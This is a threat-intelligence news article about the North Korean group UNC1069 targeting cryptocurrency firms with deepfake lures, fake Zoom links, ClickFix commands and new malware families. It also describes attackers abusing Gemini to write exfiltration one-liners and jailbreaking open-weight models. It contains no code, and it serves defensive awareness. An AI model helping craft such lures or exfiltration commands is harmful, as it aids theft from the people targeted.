North Korean UNC1069 Hackers Escalate Crypto Attacks with AI Deepfakes and Custom Malware
North Korean-linked threat actors, tracked as UNC1069, have intensified their assaults on the cryptocurrency sector using advanced AI-driven social engineering and novel malware tooling, according to a recent investigation by Google’s Mandiant threat intelligence team.[1]
The group, active since at least 2018 and suspected of ties to Pyongyang, has shifted focus since 2023 from traditional finance to Web3 targets including centralized exchanges, DeFi developers, venture capital firms, and high-tech companies.[1] In a recent intrusion targeting a FinTech entity, UNC1069 deployed seven unique malware families, including new tools like SILENCELIFT, DEEPBREATH, and CHROMEPUSH designed to harvest host and victim data.[1]
Sophisticated Social Engineering Tactics
UNC1069’s operations blend cutting-edge tradecraft with psychological manipulation. In one documented case, actors impersonated industry professionals on platforms like Telegram, building rapport before sending spoofed Calendly links to fake Zoom meetings hosted on attacker-controlled domains such as zoom[.]uswe05[.]us.[1] Victims were then directed to execute malicious “ClickFix” commands under the guise of technical troubleshooting, leading to malware deployment.[1]
The group has pioneered AI-enhanced lures, including deepfake images and videos impersonating crypto executives to distribute the BIGMACHO backdoor. These campaigns often prompt targets to install fake “Zoom SDKs,” facilitating OSINT collection for further attacks. One impersonated profile confirmed an account takeover, underscoring the reconnaissance depth.[1]
AI Weaponization in Malware and Operations
Google’s Threat Intelligence Group revealed UNC1069, also known as Masan, abusing models like Gemini to probe cryptocurrency wallet data locations and generate phishing scripts.[3][4] This marks a novel use of large language models (LLMs) during attack execution, where AI acts as a system “Administrator” to craft one-liner commands for data exfiltration, folder creation, and hardware reconnaissance.[4]
Broader trends show UNC1069 executing the first fully multi-modal AI attack: combining AI-generated Spanish text for social engineering, deepfake videos for visual verification, and voice synthesis for phone checks—overcoming language and trust barriers in crypto executive targeting.[5] Success rates for jailbreaking open-weight models reached up to 92.78% in tests, highlighting vulnerabilities in tools like Mistral Large-2.[5]
Experimental malware like PromptFlux leverages Gemini APIs to rewrite its code hourly for evasion, while PromptLock generates dynamic Lua scripts via LLMs—techniques now adopted by nation-state actors.[7]
Part of a Larger DPRK Cyber Campaign
UNC1069 is one of several North Korean clusters plundering crypto. UNC4899 and UNC5342 use fake job lures against Web3 developers, UNC4736 trojanized blockchain trading apps in a 2023 3CX supply chain hit, and UNC3782 stole $137 million from TRON users in a single 2023 day, later targeting Solana with drainers.[2][6] UNC5267 infiltrates firms via fake remote IT workers in China and Russia.[2]
| Cluster | Active Since | Primary Tactics | Notable Incidents |
|---|---|---|---|
| UNC1069 | 2018 | AI social engineering, deepfakes, ClickFix | FinTech intrusion, BIGMACHO backdoor |
| UNC3782 | 2023 | Phishing, drainers | $137M TRON theft |
| UNC4736 | 2022 | Supply chain | 3CX attack |
These efforts fund North Korea’s weapons programs amid sanctions, with DPRK actors crafting tools in Golang, C++, and Rust for cross-platform infections.[2][8] In 2025, operations grew more patient, targeting high-value “big fish” for bigger payouts.[8]
Industry Response and Implications
Google has blocked abuser accounts and bolstered model safeguards, but experts warn of escalating AI misuse—from code obfuscation to multi-modal ops.[3][7] “North Korean actors are actively developing new ways to use AI in cyberattacks,” Mandiant noted.[4]
Crypto firms are urged to train staff on deepfake detection, verify meeting links, and monitor for anomalous wallet probes. As AI lowers barriers for sophisticated attacks, the sector faces a new era of hybrid threats blending human cunning with machine intelligence.
.article { max-width: 800px; font-family: Arial, sans-serif; line-height: 1.6; }
h1 { font-size: 2.5em; color: #333; }
h2 { color: #555; border-bottom: 2px solid #eee; padding-bottom: 10px; }
.byline { color: #666; font-style: italic; margin-bottom: 20px; }
.citation { font-size: 0.8em; vertical-align: super; color: #007bff; }
table { width: 100%; border-collapse: collapse; margin: 20px 0; }
th, td { border: 1px solid #ddd; padding: 12px; text-align: left; }
th { background-color: #f2f2f2; }
.image-placeholder { text-align: center; margin: 20px 0; }
.image-placeholder img { max-width: 100%; height: auto; }
.word-count { font-size: 0.9em; color: #999; text-align: right; margin-top: 30px; }